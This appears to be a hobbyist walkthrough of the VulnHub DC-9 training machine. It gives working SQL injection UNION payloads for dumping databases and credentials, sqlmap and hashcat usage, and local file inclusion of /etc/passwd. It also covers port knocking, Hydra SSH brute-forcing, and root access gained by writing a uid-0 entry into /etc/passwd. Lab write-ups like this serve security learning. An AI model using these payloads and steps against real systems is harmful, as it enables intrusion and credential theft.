DC9 ~ VulnHub

I'm blind :( Plz Help me inject~!

DC9 ~ VulnHub

Prerequisite

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

echo "192.168.72.131	dc9.hub" >> /etc/hosts
hosts file entry

Okay now onto the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

 nmap -Pn -sC -sV -oN initial dc9.hub
โ”Œโ”€โ”€(root๐Ÿ’€nee)-[~/boxes/vulnhub/dc9]
โ””โ”€# nmap -Pn -sV -sC -oN initial dc9.hub 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-24 01:35 EST
Nmap scan report for dc9.hub (192.168.72.131)
Host is up (0.000094s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:2F:5A:5F (VMware)

Scanning & Enumeration

Based on the scan that was run, I realized that port 80 was running a web server. This was the web app that was being served!

I realized that there was a display all records and a search page which utilized some sort of database.

I went ahead tried to sql inject into the site's backend DB using the search field.

Exploitation (Method 1)

The first step I took was to check if the search parameter was vulnerable by entering ' OR '1'='1'# as the query.

The site printed out all the entries in the database which confirmed that this field was vulnerable. The next order of business was to check how many columns returned by the backend on each query (Blind Injection) so that I would be able to execute a Union Select query to dump the database. For this, I entered the following as the search term and gradually increased the number.

' OR '1'='1' ORDER BY 1#
' OR '1'='1' ORDER BY 2#
' OR '1'='1' ORDER BY 3#
' OR '1'='1' ORDER BY 4#
' OR '1'='1' ORDER BY 5#
' OR '1'='1' ORDER BY 6#

When I tried ' OR '1'='1' ORDER BY 7# , nothing was returned. This was what confirmed that the backed was returning 6 columns to us.

Next, I proceeded to construct the union select payload which I could leverage to get data out of the DB.

nee was here' and 1=1 union select 1,2,3,4,5,6#

I knew this was working properly as I stopped getting the annoying 0 results error message.

Instead, I literally got back the numbers that I entered in the respective names. I also noticed something here. The name section printed out both values 2 and 3. I assumed that it was First and Last name from the database.

Next step was to get details regarding the backend database. I decided to abuse the SQL native functions for this. Here are a bunch of SQL functions that I could have used. The following was my payload to dumb DB details:

nee was here' and 1=1 union select database(),version(),3,user(),5,6 from information_schema.tables where table_schema = database()#
Database: Staff

I then got all the existing table names in the DB with the following payload:

nee was here' and 1=1 union select table_name,version(),3,user(),5,6 from information_schema.tables where table_schema = database()#
Database: Staff
Table 1: StaffDetails
Table 2: Users

I got all the column names in the table with the following payload:

nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='Users'#

nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='StaffDetails'#
Database: Staff
Table: Users
Database: Staff
Table: StaffDetails

Followed by that, I attempted to dump out all the data from these tables with the following payloads:

nee was here' and 1=1 union select userID,Username,"",Password,"","" from Users#

nee was here' and 1=1 union select id,firstname,lastname,position,phone,email from StaffDetails#
Database: Staff
Table: Users
admin:856f5de590ef37314e7c3bdf6f8a66dc
Database: Staff
Table: StaffDetails

At this point is when I realized that there might me another Schema in this database which I might not have checked. I used the following payload to do so:

nee was here' and 1=1 union select SCHEMA_NAME,version(),3,user(),5,6 from information_schema.schemata#

This revealed that there was another schema in the DB named users. I ran the following query to list the tables in that schema:

nee was here' and 1=1 union select table_name,"","","","","" from information_schema.tables where table_schema = 'users'#

Turns out that the schema only had one table. I ran the following query to list the columns in the table:

nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = 'users' and table_name ='UserDetails'#

I was only interested in the usernames and passwords. Thus, I used the following query to dump them out:

nee was here' and 1=1 union select group_concat(username,":",password),"","","","","" from users.UserDetails#

--I used the group_concat() function to dump the usernames and passwords out on the same line--

I then used this tool online to separate the values by the ,.

Raw

marym:3kfs86sfd,julied:468sfdfsd2,fredf:4sfd87sfd1,barneyr:RocksOff,tomc:TC&TheBoyz,jerrym:B8m#48sd,wilmaf:Pebbles,bettyr:BamBam01,chandlerb:UrAG0D!,joeyt:Passw0rd,rachelg:yN72#dsd,rossg:ILoveRachel,monicag:3248dsds7s,phoebeb:smellycats,scoots:YR3BVxxxw87,janitor:Ilovepeepee,janitor2:Hawaii-Five-0

Processed

marym:3kfs86sfd
julied:468sfdfsd2
fredf:4sfd87sfd1
barneyr:RocksOff
tomc:TC&TheBoyz
jerrym:B8m#48sd
wilmaf:Pebbles
bettyr:BamBam01
chandlerb:UrAG0D!
joeyt:Passw0rd
rachelg:yN72#dsd
rossg:ILoveRachel
monicag:3248dsds7s
phoebeb:smellycats
scoots:YR3BVxxxw87
janitor:Ilovepeepee
janitor2:Hawaii-Five-0

Command Dump

list all schemas in DB=		nee was here' and 1=1 union select SCHEMA_NAME,version(),3,user(),5,6 from information_schema.schemata#
list current DB=	nee was here' and 1=1 union select database(),version(),3,user(),5,6 from information_schema.tables where table_schema = database()#

list tables in current DB=	nee was here' and 1=1 union select table_name,version(),3,user(),5,6 from information_schema.tables where table_schema = database()#



column names in table=		nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='Users'#
column names in table=		nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='StaffDetails'#


column names in table=		nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='Users'#
dump data=			nee was here' and 1=1 union select userID,Username,"",Password,"","" from Users#

column names in table=		nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = database() and table_name ='StaffDetails'#
dump data=			nee was here' and 1=1 union select id,firstname,lastname,position,phone,email from StaffDetails#



list all schemas in DB=		nee was here' and 1=1 union select SCHEMA_NAME,version(),3,user(),5,6 from information_schema.schemata#
table names in DB=		nee was here' and 1=1 union select table_name,"","","","","" from information_schema.tables where table_schema = 'users'#
column names in table=		nee was here' and 1=1 union select column_name,"","","","","" from information_schema.columns where table_schema = 'users' and table_name ='UserDetails'#
dump data=			nee was here' and 1=1 union select group_concat(username,":",password),"","","","","" from users.UserDetails#

Exploitation (Method 2)

The first step I took was to intercept and save the search query request using burp suite.

I then ran sqlmap with the request I captured.

sqlmap -r search.req -dbs

dbs= list all databases in target sql server

This revealed that the search parameter was vulnerable. Sqlmap then proceeded to list databases on target by abusing the vulnerable parameter.

I then proceeded to modify the commands to dump the database in order to retrieve information.

Database: users
Table: UserDetails
Database: Staff
Table: Users
Database: Staff
Table: StaffDetails

Exploitation (Continued)

The first thing that stood out to me was the admin credentials.

admin:856f5de590ef37314e7c3bdf6f8a66dc

It looked like an MD5 hash to me. Thus, I got to cracking it~ ๐Ÿ˜ˆ

.\hashcat.exe -m 0 <hash.file> <list.file> -O --force

Using hashcat, I was able to crack the hash within a second which revealed the password.

admin:transorbital1

Once I was logged in as admin, I realized that there was a prompt saying File does not exist. I tried to climb the directory and read other files on the machine using the file parameter.

I was successfully able to exploit a Local File Inclusion vulnerability and read /etc/passwd. I kept this in view as there was nothing valuable I could do with this vulnerability. (YET)

There was a list of usernames and passwords which I uncovered from the initial foothold (SQL Injection). I wanted to brute force these credentials for SSH access to the machine as I knew that SSH was open from the NMAP scan.

However, I kept getting this connection refused reply when I tried to connect to the machine VIA port 22.After some poking around on the net, I found that there was this thing called port knocking

In computing, port knocking is a method used to open ports on a firewall by a set of connection attempts launched over closed ports. The port will remain closed until a user attempts to initialize TCP and UDP connections to certain ports in a particular order. Read More!

After some more digging, I realized that the ports to knock could be found in the knockd.conf file located in the /etc/ directory. This is when I utilized the LFI vulnerability.

This file revealed that ports 7469,8475 and 9842 had to be knocked in that order to open SSH and ports 9842,8475 and 7469 had to be knocked in that order to close SSH. Thus I proceeded to knock those ports. I had the option to either do it with bash & NMAP or knock itself.

Bash/NMAP

for x in 7469 8475 9842; do nmap -Pn --max-retries 0 -p $x dc9.hub; done

Knock

knock dc9.hub 7469 8475 9842

As seen above, both methods allow us to connect to the target machine via SSH. Now I was ready to bruteforce my way in with Hydra. I first created 2 files with usernames and passwords respectively from the injection attack.

hydra -L username -P password dc9.hub -T 4 ssh -I
chandlerb:UrAG0D!
joeyt:Passw0rd
janitor:Ilovepeepee

These were the accounts that I uncovered from the password spraying attack.

Lateral Movement

Out of all the accounts, only the account janitor had things of interest. There was a hidden file in the home directory which had what seemed like more passwords that I could spray with hydra.

I went back to bruteforcing after I uncovered these passwords.

hydra -L username -P morepasswords dc9.hub -t 4 ssh -I
fredf:B4-Tru3-001

Looking back at the Staff Details website, I realized Fred Flintstone was also the System Administrator of the company.

Privilege Escalation

The privilege escalation on this last user was pretty straight forward. The user fredf was allowed to run a python script which seemed to read contents from a file and append it to another.

I first tried to copy my machine's public ssh key into root's authorized_keys file.

However, There was no such file in root's directory. Thus, I decided to create another entry in the /etc/passwd file similar to root's entry but changing the username and password hash. I first worked on the password hash.

ย openssl passwd -1 -salt <user> <pass>
[email protected]:~$ echo 'nee:$1$nee$Y.k72LnpATMZLyNUSzukV.:0:0:root:/root:/bin/bash' > nee4root
[email protected]:~$ sudo /opt/devstuff/dist/test/test nee4root /etc/passwd

ROOTY!